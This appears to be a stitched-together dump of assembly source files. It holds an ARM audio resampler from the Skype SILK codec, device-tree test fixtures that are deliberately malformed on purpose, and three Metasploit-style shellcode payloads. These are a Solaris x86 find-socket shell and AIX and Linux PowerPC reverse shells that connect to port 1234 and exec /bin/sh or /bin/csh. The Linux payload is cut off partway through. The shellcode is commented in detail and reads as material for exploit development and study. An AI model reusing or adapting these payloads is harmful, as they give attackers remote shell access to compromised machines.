add r0, r0, #4
ands r1, r2, #0xF0000
movne r1, r2, asr #16
bne 0f
add r0, r0, #4
ands r1, r2, #0xF000
movne r1, r2, asr #12
bne 0f
add r0, r0, #4
ands r1, r2, #0xF00
movne r1, r2, asr #8
bne 0f
add r0, r0, #4
ands r1, r2, #0xF0
movne r1, r2, asr #4
bne 0f
add r0, r0, #4
mov r1, r2
0:
/* Count leading zero bits inside the nibble in r1, one bit at a time. */
ands r2, r1, #0x8
bne 1f
add r0, r0, #1
ands r2, r1, #0x4
bne 1f
add r0, r0, #1
ands r2, r1, #0x2
bne 1f
add r0, r0, #1
ands r2, r1, #0x1
bne 1f
add r0, r0, #1
1:
ldr pc, [sp], #4        @ pop return address and return
#endif
#endif
|
open-vela/external_silk-v3-decoder | 6,467 | silk/src/SKP_Silk_resampler_private_down_FIR_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
/*
 * SKP_Silk_resampler_private_down_FIR_INTERPOL0
 *
 * ARM (EMBEDDED_ARM >= 5) inner loop of the FIR down-sampler for the
 * case without fractional coefficient interpolation: one int16 output
 * sample per pass, computed as a symmetric 12-tap FIR over 32-bit
 * buffer samples using three packed pairs of 16-bit coefficients.
 *
 * Arguments as used below:
 *   r0             output pointer (int16, written with strh)
 *   r1             input buffer pointer, saved at [sp, #sp_buf]
 *   r2             coefficient pointer (6 x int16); the register is then
 *                  reused as the Q16 index accumulator ("ind")
 *   r3             loop end index (Q16), saved at [sp, #sp_maxi]
 *   [sp, #sp_inc]  Q16 index increment, 5th argument on the caller stack
 *
 * Register aliases (VARDEF) come from SKP_Silk_AsmPreproc.h.  The
 * IPHONE variant maps val1..val3 to different physical registers --
 * presumably to respect Darwin's reserved-register conventions
 * (NOTE(review): confirm against SKP_Silk_AsmPreproc.h).
 */
VARDEF out, r1
VARDEF ind, r2
VARDEF coef0, r3
VARDEF coef1, r4
VARDEF coef2, r5
#ifdef IPHONE
VARDEF val0, r6
VARDEF val1, r8
VARDEF val2, sb
VARDEF val3, _r7
#else
VARDEF val0, r6
VARDEF val1, _r7
VARDEF val2, r8
VARDEF val3, sb
#endif
VARDEF tmpptr, sl
VARDEF tmp0, ip
VARDEF tmp1, lr
.set sp_buf, 0
.set sp_maxi, 4
.globl SYM(SKP_Silk_resampler_private_down_FIR_INTERPOL0)
SYM(SKP_Silk_resampler_private_down_FIR_INTERPOL0):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #8          @ two local slots: sp_buf, sp_maxi
.set sp_inc, 48         @ 5th arg: 40 bytes saved regs + 8 bytes locals above it
cmp r3, #0
str r1, [sp, #sp_buf]
str r3, [sp, #sp_maxi]
ble LR(1, f)            @ nothing to do if the end index is <= 0
/* Load the six 16-bit coefficients and pack them pairwise:
   coefN = c[2N] | (c[2N+1] << 16), ready for smulwb/smlawt. */
ldrh r3, [r2], #2
ldrh r6, [r2], #2
ldrh r4, [r2], #2
ldrh _r7, [r2], #2
ldrh r5, [r2], #2
ldrh r8, [r2]
mov tmpptr, r1
add coef0, r3, r6, lsl #16
add coef1, r4, _r7, lsl #16
add coef2, r5, r8, lsl #16
/* Prime the loop with the outermost sample pair: buf[0..1] and buf[10..11]. */
ldmia tmpptr, {val0, val1}
add tmpptr, tmpptr, #40
ldr tmp0, [sp, #sp_inc] @ tmp0 = Q16 index increment
ldmia tmpptr, {val2, val3}
mov ind, #0
L(0)
/* Symmetric FIR: sum mirrored samples and apply one 16-bit coefficient
   half per pair (smulwb = low half, smlawt = high half; 32x16 MACs). */
sub tmpptr, tmpptr, #32
add ind, ind, tmp0
add tmp0, val0, val3
add tmp1, val1, val2
ldmia tmpptr, {val0, val1}      @ buf[2..3]
add tmpptr, tmpptr, #24
ldmia tmpptr, {val2, val3}      @ buf[8..9]
smulwb out, tmp0, coef0
smlawt out, tmp1, coef0, out
sub tmpptr, tmpptr, #16
add tmp0, val0, val3
add tmp1, val1, val2
ldmia tmpptr, {val0, val1, val2, val3}  @ buf[4..7]
smlawb out, tmp0, coef1, out
smlawt out, tmp1, coef1, out
ldr tmpptr, [sp, #sp_buf]
add tmp0, val0, val3
add tmp1, val1, val2
smlawb out, tmp0, coef2, out
smlawt out, tmp1, coef2, out
mov tmp0, ind, asr #16          @ integer part of the Q16 index
/* Round: ((out >> 5) + 1) >> 1, then saturate to int16. */
mov out, out, asr #5
add tmpptr, tmpptr, tmp0, lsl #2 @ advance input pointer by whole samples
add out, out, #1
cmp out, #0x10000
mov out, out, asr #1
ldr tmp1, [sp, #sp_maxi]
#ifdef _WINRT
ble LR(2, f)            @ _WINRT build avoids conditionally executed mov
mov out, #0x8000
L(2)
#else
movgt out, #0x8000
#endif
subge out, out, #1      @ was >= 0x10000 before the shift: clamp to 0x7fff
cmn out, #0x8000
ldr tmp0, [sp, #sp_inc]
#ifdef _WINRT
bge LR(2, f)
mov out, #0x8000
L(2)
#else
movlt out, #0x8000      @ below -0x8000: clamp to -0x8000
#endif
cmp ind, tmp1           @ more output samples to produce?
#ifdef _WINRT
bge LR(2, f)
ldmia tmpptr, {val0, val1}
strh out, [r0], #2
add tmpptr, tmpptr, #40
ldmia tmpptr, {val2, val3}
b LR(0, b)
L(2)
strh out, [r0], #2
add tmpptr, tmpptr, #40
#else
ldmltia tmpptr, {val0, val1}    @ prefetch next iteration's outer pair
strh out, [r0], #2              @ store the saturated int16 output sample
add tmpptr, tmpptr, #40
ldmltia tmpptr, {val2, val3}
blt LR(0, b)
#endif
L(1)
add sp, sp, #8
ldmia sp!, {r4-r10, fp, ip, pc}
#ifdef IPHONE
VARDEF coefptr, _r7
VARDEF bufptr, sl
#else
VARDEF coefptr, sb
VARDEF bufptr, sl
#endif
.set sp_buf, 0
.set sp_coef, 4
.set sp_maxi, 8
/*
 * SKP_Silk_resampler_private_down_FIR_INTERPOL1
 *
 * Variant of the FIR down-sampler loop that interpolates between
 * coefficient phases: the fractional part of the Q16 index selects one
 * of FIR_Fracs coefficient sets (12 bytes / 6 packed int16 each), and
 * the mirrored set is applied in reverse order to the second half of
 * the 12 buffer samples read per output sample.
 *
 * Arguments as used below:
 *   r0                   output pointer (int16, written with strh)
 *   r1                   input buffer pointer, saved at [sp, #sp_buf]
 *   r2                   coefficient table base, saved at [sp, #sp_coef];
 *                        the register is then the Q16 index accumulator
 *   r3                   loop end index (Q16), saved at [sp, #sp_maxi]
 *   [sp, #sp_inc]        Q16 index increment (5th argument, caller stack)
 *   [sp, #sp_fir_fracs]  number of coefficient phases (6th argument)
 */
.globl SYM(SKP_Silk_resampler_private_down_FIR_INTERPOL1)
SYM(SKP_Silk_resampler_private_down_FIR_INTERPOL1):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #12         @ three local slots: sp_buf, sp_coef, sp_maxi
.set sp_inc, 52
.set sp_fir_fracs, 56
cmp r3, #0
str r1, [sp, #sp_buf]
str r2, [sp, #sp_coef]
str r3, [sp, #sp_maxi]
blt LR(1, f)
mov tmp1, #0xFF00
mov ind, #0
add tmp1, tmp1, #0xFF   @ tmp1 = 0xFFFF, mask for the Q16 fraction
ldr coefptr, [sp, #sp_coef]
ldr bufptr, [sp, #sp_buf]
L(0)
/* Select the coefficient phase from the fractional index:
   phase = (frac16 * FIR_Fracs) >> 16; each phase is 12 bytes, hence
   the lsl #3 + lsl #2 (x12) stride into the table. */
ldr out, [sp, #sp_fir_fracs]
mov tmp0, ind, asr #16
add bufptr, bufptr, tmp0, lsl #2 @ integer index part addresses the buffer
and tmp1, ind, tmp1
smulwb tmp1, tmp1, out
ldmia bufptr!, {val0, val1, val2}
add coefptr, coefptr, tmp1, lsl #3
add coefptr, coefptr, tmp1, lsl #2
ldmia coefptr, {coef0, coef1, coef2}
sub tmp1, out, tmp1     @ start of mirrored phase = FIR_Fracs - phase ...
ldr tmp0, [sp, #sp_inc]
ldr coefptr, [sp, #sp_coef]
/* First half of the FIR with the selected phase. */
smulwb out, val0, coef0
smlawt out, val1, coef0, out
smlawb out, val2, coef1, out
ldmia bufptr!, {val0, val1, val2}
sub tmp1, tmp1, #1      @ ... minus one
add ind, ind, tmp0
add coefptr, coefptr, tmp1, lsl #3
add coefptr, coefptr, tmp1, lsl #2
smlawt out, val0, coef1, out
smlawb out, val1, coef2, out
smlawt out, val2, coef2, out
ldmia coefptr, {coef0, coef1, coef2}    @ mirrored-phase coefficients
ldmia bufptr!, {val0, val1, val2}
ldr tmp0, [sp, #sp_maxi]
mov tmp1, #0xFF00
add tmp1, tmp1, #0xFF   @ re-materialize the 0xFFFF fraction mask
/* Second half: mirrored coefficients applied in reverse order. */
smlawt out, val0, coef2, out
smlawb out, val1, coef2, out
smlawt out, val2, coef1, out
ldmia bufptr!, {val0, val1, val2}
ldr coefptr, [sp, #sp_coef]
ldr bufptr, [sp, #sp_buf]
smlawb out, val0, coef1, out
smlawt out, val1, coef0, out
smlawb out, val2, coef0, out
/* Round: ((out >> 5) + 1) >> 1, then saturate to int16. */
mov out, out, asr #5
add out, out, #1
cmp out, #0x10000
mov out, out, asr #1
#ifdef _WINRT
ble LR(2, f)            @ _WINRT build avoids conditionally executed mov
mov out, #0x8000
L(2)
#else
movgt out, #0x8000
#endif
subge out, out, #1      @ was >= 0x10000 before the shift: clamp to 0x7fff
cmn out, #0x8000
#ifdef _WINRT
bge LR(2, f)
mov out, #0x8000
L(2)
#else
movlt out, #0x8000      @ below -0x8000: clamp to -0x8000
#endif
cmp ind, tmp0           @ more output samples to produce?
strh out, [r0], #2      @ store the saturated int16 output sample
blt LR(0, b)
L(1)
add sp, sp, #12
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/nuttx_libs_libc_fdt_dtc | 6,510 | tests/trees.S | #include <fdt.h>
#include "testdata.h"
/*
 * Macros for hand-assembling flattened device tree (FDT) blobs used as
 * test fixtures; token and header constants come from <fdt.h>.  All
 * multi-byte FDT fields are big-endian regardless of host endianness.
 */
/* Emit a 32-bit value in big-endian byte order. */
.macro fdtlong val
.byte ((\val) >> 24) & 0xff
.byte ((\val) >> 16) & 0xff
.byte ((\val) >> 8) & 0xff
.byte (\val) & 0xff
.endm
/* Emit a complete FDT header for blob \tree: magic, total size, the
   structure / strings / memory-reservation block offsets, version 0x11
   (last compatible version 0x10), boot CPU id 0, and the strings and
   structure block sizes.  Relies on the \tree\()_* labels the blob
   defines around its blocks. */
.macro treehdr tree
.balign 8
.globl \tree
\tree :
fdtlong FDT_MAGIC
fdtlong (\tree\()_end - \tree)
fdtlong (\tree\()_struct - \tree)
fdtlong (\tree\()_strings - \tree)
fdtlong (\tree\()_rsvmap - \tree)
fdtlong 0x11
fdtlong 0x10
fdtlong 0
fdtlong (\tree\()_strings_end - \tree\()_strings)
fdtlong (\tree\()_struct_end - \tree\()_struct)
.endm
/* One memory-reservation entry: 64-bit address and size, each given as
   high/low 32-bit halves. */
.macro rsvmape addrh, addrl, lenh, lenl
fdtlong \addrh
fdtlong \addrl
fdtlong \lenh
fdtlong \lenl
.endm
/* A reservation map containing only the all-zero terminator entry. */
.macro empty_rsvmap tree
.balign 8
\tree\()_rsvmap:
rsvmape 0, 0, 0, 0
\tree\()_rsvmap_end:
.endm
/* Property record header: FDT_PROP token, value length, and the offset
   of the property name inside \tree's strings block. */
.macro prophdr tree, name, len
fdtlong FDT_PROP
fdtlong \len
fdtlong (\tree\()_\name - \tree\()_strings)
.endm
/* Property with an empty (zero-length) value. */
.macro propnil tree, name
prophdr \tree, \name, 0
.endm
/* Property holding a single big-endian 32-bit cell. */
.macro propu32 tree, name, val
prophdr \tree, \name, 4
fdtlong \val
.endm
/* Property holding a 64-bit value as high/low 32-bit halves. */
.macro propu64 tree, name, valh, vall
prophdr \tree, \name, 8
fdtlong \valh
fdtlong \vall
.endm
/* String property: the length (including the terminating NUL) is
   computed from the emitted bytes via the local 54/55 labels, and the
   value is padded to a 4-byte boundary. */
.macro propstr tree, name, str:vararg
prophdr \tree, \name, (55f - 54f)
54:
.asciz \str
55:
.balign 4
.endm
/* FDT_BEGIN_NODE token followed by the NUL-terminated node name,
   padded to a 4-byte boundary. */
.macro beginn name:vararg
fdtlong FDT_BEGIN_NODE
.asciz \name
.balign 4
.endm
/* FDT_END_NODE token. */
.macro endn
fdtlong FDT_END_NODE
.endm
/* Entry in \tree's strings block, labelled so prophdr can compute its
   offset. */
.macro string tree, name, str:vararg
\tree\()_\name :
.asciz \str
.endm
.data
/*
 * test_tree1: the canonical well-formed test blob -- two real memory
 * reservations plus the zero terminator, nested subnodes, string-list
 * property values and phandles.  TEST_* / PHANDLE_* constants come
 * from testdata.h.
 */
treehdr test_tree1
.balign 8
test_tree1_rsvmap:
rsvmape TEST_ADDR_1H, TEST_ADDR_1L, TEST_SIZE_1H, TEST_SIZE_1L
rsvmape TEST_ADDR_2H, TEST_ADDR_2L, TEST_SIZE_2H, TEST_SIZE_2L
/* terminating all-zero entry */
rsvmape 0, 0, 0, 0
test_tree1_rsvmap_end:
test_tree1_struct:
/* root node (empty name) */
beginn ""
propstr test_tree1, compatible, "test_tree1"
propu32 test_tree1, prop_int, TEST_VALUE_1
propu64 test_tree1, prop_int64, TEST_VALUE64_1H, TEST_VALUE64_1L
propstr test_tree1, prop_str, TEST_STRING_1
propu32 test_tree1, address_cells, 1
propu32 test_tree1, size_cells, 0
beginn "subnode@1"
propstr test_tree1, compatible, "subnode1"
propu32 test_tree1, reg, 1
propu32 test_tree1, prop_int, TEST_VALUE_1
beginn "subsubnode"
/* "\0"-separated string lists */
propstr test_tree1, compatible, "subsubnode1\0subsubnode"
propstr test_tree1, placeholder, "this is a placeholder string\0string2"
propu32 test_tree1, prop_int, TEST_VALUE_1
endn
beginn "ss1"
endn
endn
beginn "subnode@2"
propu32 test_tree1, reg, 2
propu32 test_tree1, linux_phandle, PHANDLE_1
propu32 test_tree1, prop_int, TEST_VALUE_2
propu32 test_tree1, address_cells, 1
propu32 test_tree1, size_cells, 0
beginn "subsubnode@0"
propu32 test_tree1, reg, 0
propu32 test_tree1, phandle, PHANDLE_2
propstr test_tree1, compatible, "subsubnode2\0subsubnode"
propu32 test_tree1, prop_int, TEST_VALUE_2
endn
beginn "ss2"
endn
endn
endn
fdtlong FDT_END
test_tree1_struct_end:
/* Strings block: the property names referenced by prophdr offsets above. */
test_tree1_strings:
string test_tree1, compatible, "compatible"
string test_tree1, prop_int, "prop-int"
string test_tree1, prop_int64, "prop-int64"
string test_tree1, prop_str, "prop-str"
string test_tree1, linux_phandle, "linux,phandle"
string test_tree1, phandle, "phandle"
string test_tree1, reg, "reg"
string test_tree1, placeholder, "placeholder"
string test_tree1, address_cells, "#address-cells"
string test_tree1, size_cells, "#size-cells"
test_tree1_strings_end:
test_tree1_end:
/*
 * truncated_property: malformed blob whose property header claims a
 * 4-byte value that is not actually present (the structure block also
 * ends without an FDT_END token).
 */
treehdr truncated_property
empty_rsvmap truncated_property
truncated_property_struct:
beginn ""
prophdr truncated_property, prop_truncated, 4
/* Oops, no actual property data here */
truncated_property_struct_end:
truncated_property_strings:
string truncated_property, prop_truncated, "truncated"
truncated_property_strings_end:
truncated_property_end:
/*
 * bad_node_char: node name contains '$', outside the character set the
 * devicetree spec permits in node names.
 */
treehdr bad_node_char
empty_rsvmap bad_node_char
bad_node_char_struct:
beginn ""
beginn "sub$node"
endn
endn
fdtlong FDT_END
bad_node_char_struct_end:
bad_node_char_strings:
bad_node_char_strings_end:
bad_node_char_end:
/*
 * bad_node_format: node name carries two '@' unit-address separators,
 * which is not a valid node name format.
 */
treehdr bad_node_format
empty_rsvmap bad_node_format
bad_node_format_struct:
beginn ""
beginn "subnode@1@2"
endn
endn
fdtlong FDT_END
bad_node_format_struct_end:
bad_node_format_strings:
bad_node_format_strings_end:
bad_node_format_end:
/*
 * bad_prop_char: property name contains '$', outside the character set
 * the devicetree spec permits in property names.
 */
treehdr bad_prop_char
empty_rsvmap bad_prop_char
bad_prop_char_struct:
beginn ""
propu32 bad_prop_char, prop, TEST_VALUE_1
endn
fdtlong FDT_END
bad_prop_char_struct_end:
bad_prop_char_strings:
string bad_prop_char, prop, "prop$erty"
bad_prop_char_strings_end:
bad_prop_char_end:
/* overflow_size_strings */
/*
 * Header is written out longhand (rather than via treehdr) so that
 * size_dt_strings can be a bogus 0xffffffff; the bad_string name
 * "offset" below also resolves 256 MiB past the strings block.
 * Exercises overflow checking in string accessors.
 */
.balign 8
.globl ovf_size_strings
ovf_size_strings:
fdtlong FDT_MAGIC
fdtlong (ovf_size_strings_end - ovf_size_strings)
fdtlong (ovf_size_strings_struct - ovf_size_strings)
fdtlong (ovf_size_strings_strings - ovf_size_strings)
fdtlong (ovf_size_strings_rsvmap - ovf_size_strings)
fdtlong 0x11
fdtlong 0x10
fdtlong 0
/* deliberately absurd size_dt_strings */
fdtlong 0xffffffff
fdtlong (ovf_size_strings_struct_end - ovf_size_strings_struct)
empty_rsvmap ovf_size_strings
ovf_size_strings_struct:
beginn ""
propu32 ovf_size_strings, bad_string, 0
endn
fdtlong FDT_END
ovf_size_strings_struct_end:
ovf_size_strings_strings:
string ovf_size_strings, x, "x"
/* The bad_string "name" symbol points far outside the blob. */
ovf_size_strings_bad_string = ovf_size_strings_strings + 0x10000000
ovf_size_strings_strings_end:
ovf_size_strings_end:
/* truncated_string */
/*
 * Malformed blob: the last string in the strings block ("bad") has no
 * NUL terminator, so reading the bad_string property name runs off the
 * end of the blob.
 */
treehdr truncated_string
empty_rsvmap truncated_string
truncated_string_struct:
beginn ""
propnil truncated_string, good_string
propnil truncated_string, bad_string
endn
fdtlong FDT_END
truncated_string_struct_end:
truncated_string_strings:
string truncated_string, good_string, "good"
truncated_string_bad_string:
.ascii "bad"
/* NOTE: terminating \0 deliberately missing */
truncated_string_strings_end:
truncated_string_end:
/* truncated_memrsv */
/*
 * Malformed blob: the memory-reservation map is placed at the very end
 * of the blob with a single real entry and no all-zero terminator, so
 * walking it runs off the end.
 */
treehdr truncated_memrsv
truncated_memrsv_struct:
beginn ""
endn
fdtlong FDT_END
truncated_memrsv_struct_end:
truncated_memrsv_strings:
truncated_memrsv_strings_end:
.balign 8
truncated_memrsv_rsvmap:
rsvmape TEST_ADDR_1H, TEST_ADDR_1L, TEST_SIZE_1H, TEST_SIZE_1L
truncated_memrsv_rsvmap_end:
truncated_memrsv_end:
/* two root nodes */
/* Malformed blob: the structure block contains two top-level nodes. */
treehdr two_roots
empty_rsvmap two_roots
two_roots_struct:
beginn ""
endn
beginn ""
endn
fdtlong FDT_END
two_roots_struct_end:
two_roots_strings:
two_roots_strings_end:
two_roots_end:
/* root node with a non-empty name */
/* Malformed blob: the root node's name must be empty, not "fake". */
treehdr named_root
empty_rsvmap named_root
named_root_struct:
beginn "fake"
endn
fdtlong FDT_END
named_root_struct_end:
named_root_strings:
named_root_strings_end:
named_root_end:
|
OpenWireSec/metasploit | 1,873 | external/source/unixasm/sol-x86-fndsockcode.s | /*
* sol-x86-fndsockcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 86 bytes
# Solaris/x86 "find socket" shellcode (AT&T syntax): locate the already-
# connected attacker socket by its peer port, wire it to fds 0-2, then
# exec a shell.
fndsockcode_part1:
xorl %ebx,%ebx                  # ebx = 0
mull %ebx                       # eax = edx = 0 (mul clobbers edx:eax)
pushl %ebx
movl %esp,%edi                  # edi -> zeroed scratch/sockaddr buffer on the stack
syscallcode:
# Build a reusable, NUL-free syscall gadget on the stack.  The two
# pushed constants are decoded in place by the not instructions into
# the byte sequence 9a 00 00 00 00 27 00 c3, i.e.:
#   lcall $0x27,$0x0    (far call through the Solaris syscall gate)
#   ret
# esi points at the gadget; "call *%esi" performs the system call whose
# number is in %eax with arguments on the stack.
pushl $0x3cffd8ff
pushl $0x65
movl %esp,%esi
notl 0x04(%esi)
notb (%esi)
fndsockcode_part2:
# Build a netbuf {maxlen=0x91, len=0x91, buf=edi} and scan descriptors
# 1,2,3,... with ioctl(fd, 0x5491, &netbuf) -- syscall 0x36 = ioctl,
# request 0x5491 presumably TI_GETPEERNAME (NOTE(review): confirm
# against <sys/timod.h>) -- until the peer address written at edi has
# port 1234 (0x04d2 network order reads as 0xd204 little-endian).
pushl %edi
movb $0x91,%bl
pushl %ebx
pushl %ebx
pushl %esp
movb $0x54,%bh
pushl %ebx
pushl %eax
0:
popl %eax                       # current fd
incl %eax                       # try the next fd
pushl %eax
pushl $0x36
popl %eax                       # eax = syscall number 0x36 (ioctl)
call *%esi
cmpw $0xd204,0x02(%edi)         # sockaddr_in.sin_port == htons(1234)?
jne 0b
# Duplicate the found socket: fcntl(fd, F_DUP2FD=9, n) -- syscall 0x3e --
# for n counting down from fd to 0; the target-fd slot is decremented in
# place at -0x20(%edi).
popl %eax
pushl %eax
pushl $0x09
pushl %eax
1:
pushl $0x3e
popl %eax
call *%esi
decl -0x20(%edi)
jns 1b
shellcode:
# execve("/bin//sh", {path, NULL}, ...) via Solaris syscall 0x3b.
# xorl %eax,%eax
pushl %eax                      # string terminator
pushl $0x68732f2f               # "//sh"
pushl $0x6e69622f               # "/bin"
movl %esp,%ebx                  # ebx -> "/bin//sh"
pushl %eax
pushl %ebx
movl %esp,%ecx                  # ecx -> argv = { path, NULL }
pushl %eax
pushl %ecx
pushl %ebx
movb $0x3b,%al
call *%esi
|
OpenWireSec/metasploit | 2,737 | external/source/unixasm/aix-power-cntsockcode.S | /*
* aix-power-cntsockcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Supported AIX versions:
*
* -DAIX614 AIX Version 6.1.4
* -DAIX613 AIX Version 6.1.3
* -DAIX612 AIX Version 6.1.2
* -DAIX611 AIX Version 6.1.1
* -DAIX5310 AIX Version 5.3.10
* -DAIX539 AIX Version 5.3.9
* -DAIX538 AIX Version 5.3.8
* -DAIX537 AIX Version 5.3.7
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
# AIX/PowerPC reverse-shell ("connect back") shellcode: connect to
# 127.0.0.1:1234, duplicate the socket onto fds 0-2, then exec /bin/csh.
# Syscall numbers (__NC_*) come from aix-power.h and vary by AIX level;
# __CAL is a base constant so small immediates can be formed NUL-free
# with cal (addi).
syscallcode:
# xor. %r31,%r31,%r31
xor. %r5,%r5,%r5                # r5 = 0; sets cr0 so bnel falls through...
bnel syscallcode                # ...but LK=1 still writes LR = next addr (getpc)
mflr %r30
cal %r30,511(%r30)
cal %r30,-511+36(%r30)          # r30 = pc+36 -> the "cal %r30,-8(%r30)" below
mtctr %r30
bctr                            # jump over the embedded data
.long 0xff0204d2                # sockaddr_in: len/AF_INET=2, port 1234 (0x04d2)
.long 0x7f000001                # sin_addr = 127.0.0.1
crorc %cr6,%cr6,%cr6            # syscall stub: crorc (AIX linkage) ...
.long 0x44ffff02                # ... plus the raw-encoded system-call insn
cal %r30,-8(%r30)               # r30 -> syscall stub; sockaddr sits at r30-8
cntsockcode:
lil %r29,__CAL
# socket(AF_INET=2, SOCK_STREAM=1, 0)  (r5 already 0 from above)
# xor %r5,%r5,%r5
cal %r4,-__CAL+1(%r29)
cal %r3,-__CAL+2(%r29)
cal %r2,__NC_socket(%r29)       # AIX passes the syscall number in r2
mtctr %r30
bctrl
mr %r28,%r3                     # r28 = socket fd
# connect(fd, &sockaddr, 16)
cal %r5,-__CAL+16(%r29)
cal %r4,-8(%r30)                # r4 -> embedded sockaddr above
cal %r2,__NC_connect(%r29)
mtctr %r30
bctrl
# For fd = 2,1,0: close(fd), then kfcntl(sock, F_DUPFD=0, fd) --
# duplicating to the lowest free descriptor >= fd emulates dup2.
cal %r27,-__CAL+2(%r29)
0:
mr %r3,%r27
cal %r2,__NC_close(%r29)
mtctr %r30
bctrl
# kfcntl
mr %r5,%r27
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_kfcntl(%r29)
mtctr %r30
bctrl
ai. %r27,%r27,-1
bge 0b
shellcode:
# execve("/bin/csh", {path, NULL}, 0)
# lil %r29,__CAL
xor. %r5,%r5,%r5
bnel shellcode                  # not taken; LR = next addr (getpc for the string)
# mflr %r30
# cal %r30,511(%r30)
# cal %r3,-511+40(%r30)
# stb %r5,-511+48(%r30)
mflr %r24
cal %r24,511(%r24)
cal %r3,-511+40(%r24)           # r3 -> "/bin/csh" (40 bytes past the bnel)
stb %r5,-511+48(%r24)           # ensure the string is NUL-terminated
stu %r5,-4(%r1)                 # argv[1] = NULL
stu %r3,-4(%r1)                 # argv[0] = path
mr %r4,%r1                      # r4 = argv
cal %r2,__NC_execve(%r29)
# crorc %cr6,%cr6,%cr6
# .long 0x44ffff02
mtctr %r30
bctrl
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 2,323 | external/source/unixasm/lin-power-cntsockcode.S | /*
* lin-power-cntsockcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
.globl main
main:
# Linux/PowerPC reverse-shell shellcode: connect to 127.0.0.1:1234,
# dup2 the socket onto fds 0-2, then exec /bin/sh.  Network calls go
# through sys_socketcall (subcode in r3, pointer to the argument block
# in r4); the raw word 0x44ffff02 is the sc (system call) instruction
# encoded without NUL bytes.  __NC_* numbers come from linux-power.h.
cntsockcode:
xor %r31,%r31,%r31
lil %r29,__CAL                  # base constant for NUL-free immediates via cal
# socket(AF_INET=2, SOCK_STREAM=1, 0) via socketcall
cal %r28,-511+1(%r29)
cal %r27,-511+2(%r29)
stu %r31,-4(%r1)                # arg block (pushed in reverse): protocol = 0
stu %r28,-4(%r1)                # type = SOCK_STREAM
stu %r27,-4(%r1)                # domain = AF_INET
mr %r4,%r1
cal %r3,__NC_socket(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02                # sc
mr %r26,%r3                     # r26 = socket fd
# connect(fd, &{AF_INET, 1234, 127.0.0.1}, 16)
cal %r25,-511+16(%r29)
/*
 * The following GPRs result in zeros when used with liu instruction.
 * %r24, %r16, %r8, %r0
 *
 */
liu %r23,0x7f00
oril %r23,%r23,0x0001           # r23 = 0x7f000001 = 127.0.0.1
lil %r22,0x04d2                 # port 1234
stu %r23,-4(%r1)                # sin_addr
stu %r22,-4(%r1)                # sin_port in the low halfword ...
st %r27,-2(%r1)                 # ... then overwrite the top halfword: family = 2
mr %r21,%r1                     # r21 -> sockaddr_in
